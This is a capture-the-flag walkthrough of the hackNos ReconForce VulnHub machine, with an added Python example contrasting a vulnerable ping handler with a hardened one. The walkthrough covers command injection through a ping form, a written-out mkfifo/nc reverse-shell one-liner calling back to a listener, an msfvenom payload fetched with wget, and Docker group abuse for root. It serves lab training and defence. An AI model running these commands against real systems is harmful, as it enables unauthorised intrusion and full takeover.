
Today we’re doing the hackNos: ReconForce VM from Vulnhub.com. It was created by Rahul Gehlaut and is part of the hackNos series, and it is rated as an intermediate VM. Let’s dive in and see how far we get.
So as usual the first step is to nmap the box to see what services are running on it. I am going to use the nmapAutomator script this time.

So it’s got 3 ports open. We should start by looking at port 80 and then move on to FTP to see if there are files or info on there that might be helpful.
Port 80 first though.

That’s a pretty hacker-themed front page right there, haha. Looking at the source code there isn’t much there, but if we click on the “TroubleShooting” link in the middle of the page it pops up a login window.

We haven’t found any credentials at this point, but it’s worth trying a few common ones on the off chance that we get lucky. By common I mean things like admin:admin or admin:password.
After trying a few different options and not getting anywhere, I think we should move on and try to find some credentials or clues that we can use to log in.
Let’s move on to the FTP server and see if that’s the way forward. We got lucky: the server allows anonymous logins.

Taking a look around shows us that there is nothing on the server for us to use at all.

Hmmm, this doesn’t feel right. There is an FTP server on the box for a reason; it isn’t there just by chance. What are we missing?
The only thing the server gives us is the banner “Security@hackNos”. Maybe it is a username or a password?

Let’s try using it on the login box we found before.


After trying a few different combinations, admin:Security@hackNos got lucky and we found ourselves logged in :-)

Awesome, we are in. The page is an input box that will “ping” an IP address for us. We can see the output of the command if we just aim it at the box’s own address.


OK, so we need to find a way of exploiting the input box. Let’s jump over to Google and see what we can find. I remember a box on HTB, I think from last year, that had a similar exploit: essentially the application ran the ping command and you appended whatever command you wanted on the end of it, but I can’t remember the syntax for running both commands. Let’s quickly try a simple & or &&, which would work on an actual Linux CLI.
That didn’t work, so I went back to Google and found this HackerOne blog post, which gave me loads of things to try. I started at the top of the list and worked my way down until I got to this one.

It didn’t work on the first attempt, but when I tweaked it slightly for the input box we have it did. We don’t need to supply the ping command ourselves; we only need the IP address followed by the “injectionCmd” part, so our full injection becomes:
<IP> |<injectionCmd>

When we send this off we get a hit: we have remote command execution on the victim machine.
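To make the `<IP> |<injectionCmd>` trick concrete, here is an added example (my own illustrative code, not the ReconForce application’s source, which we never see) of a ping handler that strips a few chaining operators but builds its command line as a string, next to the hardened form. The denylist of “&&”, “&” and “;” is an assumption standing in for whatever filtering the real page did; it shows why the & and && attempts went nowhere while a pipe sailed straight through, and why validating the target as an IP literal and passing it as one argv element closes the hole for good.

```python
import ipaddress
import shlex
import subprocess

# Assumed denylist: stands in for whatever the real form filtered. It strips the
# chaining operators the walkthrough tried first but says nothing about "|".
NAIVE_DENYLIST = ("&&", "&", ";")


def naive_filter(user_input: str) -> str:
    """Vulnerable: delete a few operators and trust whatever is left."""
    cleaned = user_input
    for token in NAIVE_DENYLIST:
        cleaned = cleaned.replace(token, "")
    return cleaned


def vulnerable_command(user_input: str) -> str:
    """Vulnerable: the exact string a handler like sh -c "ping -c 1 $target" runs.
    Anything the denylist misses ("|", "$(...)", backticks, newlines) is shell syntax."""
    return f"ping -c 1 {naive_filter(user_input)}"


def pipe_stages(command_string: str) -> list[str]:
    """Tokenise the way sh would and split at "|", so an injected command shows up
    as its own pipeline stage instead of being hidden inside the ping line."""
    lexer = shlex.shlex(command_string, posix=True, punctuation_chars=True)
    stages, current = [], []
    for tok in lexer:
        if tok == "|":
            stages.append(" ".join(current))
            current = []
        else:
            current.append(tok)
    stages.append(" ".join(current))
    return stages


def is_valid_target(user_input: str) -> bool:
    """Hardened check: the only acceptable input is an IPv4 or IPv6 address literal."""
    try:
        ipaddress.ip_address(user_input.strip())
    except ValueError:
        return False
    return True


def safe_argv(user_input: str) -> list[str]:
    """Hardened: validate, then pass the target as a single argv element.
    No shell is involved, so no operator can ever be interpreted."""
    if not is_valid_target(user_input):
        raise ValueError(f"not an IP address: {user_input!r}")
    return ["ping", "-c", "1", str(ipaddress.ip_address(user_input.strip()))]


def run_hardened(user_input: str) -> subprocess.CompletedProcess:
    """Execute the hardened form (needs `ping` on PATH; not exercised offline)."""
    return subprocess.run(safe_argv(user_input), capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    # Constructed inputs: the three payload shapes tried in the walkthrough.
    for attempt in ("127.0.0.1 && id", "127.0.0.1 & id", "127.0.0.1 |id"):
        cmd = vulnerable_command(attempt)
        print(f"{attempt!r:20} -> sh -c {cmd!r}")
        print(f"{'':20}    pipeline stages: {pipe_stages(cmd)}")
    for attempt in ("127.0.0.1", "127.0.0.1 |id"):
        print(f"{attempt!r:20} valid target? {is_valid_target(attempt)}")
    print("hardened argv:", safe_argv("  10.0.0.5 "))
```

With the & variants the operator is deleted and `id` is left as a harmless extra argument to ping; with the pipe the string reaches the shell intact and `id` becomes a second pipeline stage, which is exactly what the form returned. The fix is not a longer denylist but never letting the input touch a shell at all.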

Perfect. We have found the weakness in the armour; now to fully exploit it and get a shell on the machine. The first thing to try is a one-line nc reverse shell and see if we can get it to call back to our attacking machine. Let’s start a simple nc listener and then fire the command off.

OK, so the basic nc one-liner didn’t work, but we have more to try, so let’s move on to the next one (10.0.0.1 and 1234 are the listener’s address and port; substitute your own):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
That didn’t work either, so we need to get a little more adventurous: we can create an msfvenom payload, serve it from our attacking machine, and use the command injection to wget the file onto the victim box. Let’s create the payload first.

Now we have the payload we should try to upload it.

We don’t get any feedback from the upload, but let’s assume that it worked and move on to the next step (if in doubt, an injected ls -l of the target directory through the same input box will confirm the file landed). We need to start a Meterpreter handler to catch the callback.


Once we run |php shell.php through the input box (after the IP, just like before) we are greeted with the best sight!!

Now that we have a session open, we can upload one of our trusty enumeration scripts and try to find a way to root. First, though, we can grab the user flag.

Awesome, one down, root to go.
After looking around the box for ages and finding nothing of much use, I did see one other user on the box called recon, so on a whim I tried su’ing to that user with the same password as the login box from earlier. Password reuse between services is always worth a try.

It worked!! Let’s upload one of our enumeration scripts and see what we can find.
After running linpeas.sh and reviewing the output, the only thing that stands out is that Docker seems to be running on the machine.

OK, so let’s jump back to Google and see if we can find a way to abuse Docker. We should start by looking at the excellent GTFOBins site.

There are a few commands on the docker entry, so let’s start at the first one and go from there until we either get root or run out of things to try. Let’s run the first command.

Wow, I didn’t expect it to work on the first try!! But that’s it, we are root and that’s game over. All we need to do now is grab the root flag before we log out. The reason this is so easy is worth remembering: the Docker daemon runs as root, so any user who can talk to it (for example a member of the docker group) can have it mount the host filesystem into a container they control, which is effectively root on the host.

Thanks to Rahul Gehlaut for creating the VM and to Vulnhub for hosting it and all the other great VMs on their site.
